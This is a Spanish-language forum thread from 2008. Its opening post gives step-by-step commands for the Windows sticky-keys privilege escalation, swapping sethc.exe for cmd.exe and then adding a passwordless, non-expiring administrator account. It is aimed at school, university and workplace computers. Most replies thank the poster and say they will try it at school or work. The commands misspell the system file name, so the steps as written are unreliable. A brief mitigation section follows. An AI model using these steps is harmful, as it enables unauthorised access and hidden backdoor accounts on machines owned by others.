Escalar privilegios Administrador (colegios,U,etc)

Discussion in 'Cementerio De Temas' started by sanwolf, Sep 2, 2008.

  1. sanwolf

    sanwolf Usuario Nuevo nvl. 1
    16/41

    Joined:
    Jul 7, 2008
    Messages:
    112
    Likes Received:
    0
    Te gustaria escalar a privilegios de administrador de tu maquina en recintos como colegios, Universidades y hasta el mismo trabajo, bueno aqui un manual muy educativo Xd.

    Bueno una pequeña introduccion:

    Windows tiene una vulnerabilidad en su sistema que hasta el dia de hoy no es solucionada, se trata de stickykeys, este se activa al pulsar 5 veces la tecla shift.
    Este tipo de ataque se llama, escalada de privilegios, pues te permite obtener acceso como Administrador a un equipo en el cual tenias derechos restringidos
    http://img53.*************/img53/8004/tecladologitechwe0.jpg

    Este es Stickykeys, creo que a mas de alguno le ha salido esta ventanita molestosa mientras estamos jugando o realizando alguna actividad que involucre tipear la tecla shift.
    [​IMG]
    Esta ventanita tambien aparece en el inicio de sesion de windows lo cual aprovecharemos en esta vulnerabilidad
    http://img522.*************/img522/6840/bienvenidastickykeysjf5.jpg

    Bueno ahora realizaremos un pequeño cambio, para que en ves de que aparesca esta molestosa ventanita aparesca el simbolo del sistema[MS-DOS]
    [Queda claro que necesitamos acceso fisico al pc]
    Vamos a inicio->ejecutar y escribimos "cmd" [sin las comillas]
    http://img380.*************/img380/5918/41845640wb9.jpg

    Nos aparecera la siguiente ventanita de MS-DOS
    [​IMG]

    Empezaremos a escribir los comandos

    1-. Escribimos "cd\" [sin comillas] y pulsamos enter
    2-. "cd WINDOWS" [sin comillas] y pulsamos enter
    3-. "cd system32" [sin comillas] y pulsamos enter
    3-. *copy "c:\WINDOWS\system32\setch.exe" "c:\WINDOWS\system32\backup sethc.exe"* [sin los asteriscos *] y pulsamos enter
    4-. *copy "c:\WINDOWS\system32\cmd.exe" "c:\WINDOWS\system32\setch.exe"* [sin los asteriscos *] y pulsamos enter [si nos pide confirmacion ponemos "yes" o "si" dependiendo del SO]
    5-. "exit" [sin comillas] y pulsamos enter

    Bueno ya tenemos no esta la ventana de stickykeys pero si la de MS-DOS [para verificar tipeen 5 veces shift]
    http://img179.*************/img179/4390/sethcexepm9.jpg

    Bueno ahora a escalar privilegio de administrador.
    Reinicien el sistema.
    En la pantalla de bienvenida con las cuentas pulsan 5 veces la tecla shift y aparecera lo anterior

    http://img183.*************/img183/6440/administradorgm9.jpg

    Ahora crearemos un usuario Admin, para ello introducimos el siguiente comando:
    "Net user Elusuarioquequieras /add /expires:never /passwordreq:no" [sin comillas]

    Esto nos creara un usuario que en este caso se llamara Elusuarioquequieras, el cual nunca caduca y no requiere de password.

    Para darle permisos de Admin al usuario que hemos creado (aunque es muy provable que no lo veas en la pantalla de bienvenida), ejecutamos el siguiente comando:
    "Net localgroup Administradores /add Elusuarioquequieras" [sin comillas]

    Reiniciamos el PC y ahora si que veremos a nuestro nuevo usuario con permisos de Admin

    Protegerse de este fallo

    Para protegerse de este fallo de seguridad basta con ir a panel de control, darle a vista clasica y entrar en opciones de accesibilidad, en la pesta?a teclado nos fijamos en el cuadro que pone StickyKeys y le damos a configuracion, dentro de esta ventana desmarcamos la opcion utilizar metodo abreviado, aceptamos y listo, luego nos toca repetir los mismos pasos con Togglekeys y con Filterkeys(aunque esta ultima no termina lanzando la consola desde la pantalla de bienvenida si lo hace desde una cuenta limitada por lo que es mejor desactivar la funcion abreviada para mayor seguridad).
    Con esto evitariamos que un usuario ejecute el punto numero 5 de este texto desde una cuenta limitada, pero no evitaremos la ejecucion del mismo punto desde la pantalla de bienvenida, algo que tendria que haber sido corregido hace bastante tiempo.

    _____________________________________________________________-


     
  2. janod21

    janod21 Usuario Habitual nvl.3 ★
    132/163

    Joined:
    Aug 9, 2007
    Messages:
    7,005
    Likes Received:
    295
    me dio paja de leer lo por completo pero se supone s que es para realizas acciones con privilegio de adm del pc???
     
  3. PeLiCaN

    PeLiCaN Usuario Habitual nvl.3 ★
    187/244

    Joined:
    Mar 26, 2008
    Messages:
    14,624
    Likes Received:
    18
    buen dato algun dia lo haré. Se agraedece
     
  4. virox

    virox Usuario Casual nvl. 2
    87/163

    Joined:
    Jul 9, 2007
    Messages:
    9,206
    Likes Received:
    16
    ams ,

    dale lo provare en mi INStituto : )

    grax
     
  5. EL PROCER

    EL PROCER Usuario Habitual nvl.3 ★
    187/244

    Joined:
    Jul 4, 2007
    Messages:
    16,315
    Likes Received:
    15
    Se agradece compa
     
  6. di_piterson

    di_piterson Usuario Nuevo nvl. 1
    17/41

    Joined:
    Jun 5, 2008
    Messages:
    501
    Likes Received:
    1
    yap probando
     
  7. cucarro

    cucarro Usuario Nuevo nvl. 1
    1/41

    Joined:
    Oct 23, 2006
    Messages:
    23
    Likes Received:
    0
    buenop el datop !
     
  8. kHARU

    kHARU Usuario Casual nvl. 2
    37/41

    Joined:
    Jan 17, 2007
    Messages:
    2,261
    Likes Received:
    3
    buen dato viejo
     
  9. ncomax

    ncomax Usuario Nuevo nvl. 1
    1/41

    Joined:
    Oct 4, 2008
    Messages:
    9
    Likes Received:
    0
    si realizo el trabajito y suponiendo que funciona me puede cachar el administrador de la red pa hacerla en la pega jejejej
     
  10. kymani

    kymani Usuario Casual nvl. 2
    37/41

    Joined:
    Jul 16, 2007
    Messages:
    3,720
    Likes Received:
    2
    quw wenaa compaaa
     
  11. shaknorris

    shaknorris Usuario Casual nvl. 2
    37/41

    Joined:
    Aug 26, 2006
    Messages:
    2,917
    Likes Received:
    2
    lo trate de hacer pero no pasa nada
     
  12. sebastianandres

    sebastianandres Usuario Nuevo nvl. 1
    16/41

    Joined:
    Oct 21, 2008
    Messages:
    177
    Likes Received:
    0
    gracias men muy buen dato me gusto mucho
    ya que en la u se puede hacer ya lo probe
    jajajajajjaajajajjajaja
    saludos men

    sebastianandres
    ::portalnet::